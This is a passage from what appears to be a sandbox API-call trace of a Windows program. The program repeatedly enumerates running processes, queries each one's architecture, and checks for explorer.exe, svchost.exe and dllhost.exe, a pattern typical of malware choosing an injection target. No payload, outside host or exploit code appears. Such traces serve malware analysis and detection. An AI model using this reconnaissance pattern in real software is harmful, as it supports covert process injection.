cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0191.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0191.848] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.848] CloseHandle (hObject=0xd8) returned 1 [0191.848] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0191.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0191.848] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.848] CloseHandle (hObject=0xd8) returned 1 [0191.848] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0191.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0191.849] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.849] CloseHandle (hObject=0xd8) returned 1 [0191.849] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0191.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0191.850] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.850] CloseHandle (hObject=0xd8) returned 1 [0191.850] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0191.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0191.850] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.850] CloseHandle (hObject=0xd8) returned 1 [0191.850] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0191.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0191.851] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.851] CloseHandle (hObject=0xd8) returned 1 [0191.851] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0191.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0191.851] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.851] CloseHandle (hObject=0xd8) returned 1 [0191.851] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0191.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0191.852] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.852] CloseHandle (hObject=0xd8) returned 1 [0191.852] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0191.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0191.853] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.853] CloseHandle (hObject=0xd8) returned 1 [0191.853] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0191.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0191.853] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.853] CloseHandle (hObject=0xd8) returned 1 [0191.853] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0191.854] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0191.854] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0191.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0191.855] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0191.855] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0191.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0191.856] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0191.856] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0191.857] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.857] CloseHandle (hObject=0xd8) returned 1 [0191.857] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0191.857] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0191.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0191.858] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.858] CloseHandle (hObject=0xd8) returned 1 [0191.858] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0191.858] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0191.858] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0191.858] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0191.858] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0191.859] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.859] CloseHandle (hObject=0xd8) returned 1 [0191.859] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0191.859] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.860] CloseHandle (hObject=0xd8) returned 1 [0191.860] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0191.860] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0191.860] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.860] CloseHandle (hObject=0xd8) returned 1 [0191.860] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.861] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0191.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0191.861] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.861] CloseHandle (hObject=0xd8) returned 1 [0191.861] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0191.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0191.862] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0191.862] CloseHandle (hObject=0xd4) returned 1 [0191.862] Sleep (dwMilliseconds=0x3e8) [0192.937] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0192.939] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0192.940] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0192.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0192.940] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0192.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0192.941] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0192.941] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0192.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0192.942] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0192.942] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0192.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0192.943] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0192.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0192.943] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0192.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0192.944] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0192.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0192.944] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0192.945] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0192.945] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0192.946] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0192.947] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0192.947] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0192.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0192.948] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0192.948] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0192.949] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0192.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0192.949] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.949] CloseHandle (hObject=0xd8) returned 1 [0192.949] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0192.949] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0192.949] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0192.949] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0192.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0192.950] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0192.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0192.950] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.950] CloseHandle (hObject=0xd8) returned 1 [0192.951] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0192.951] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0192.951] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0192.951] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0192.951] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0192.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0192.952] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0192.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0192.952] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.952] CloseHandle (hObject=0xd8) returned 1 [0192.952] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0192.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0192.953] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.953] CloseHandle (hObject=0xd8) returned 1 [0192.953] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0192.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0192.953] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.953] CloseHandle (hObject=0xd8) returned 1 [0192.953] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0192.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0192.954] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0192.954] CloseHandle (hObject=0xd8) returned 1 [0192.954] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0192.954] OpenProcess (dwDesiredAccess=0x400, 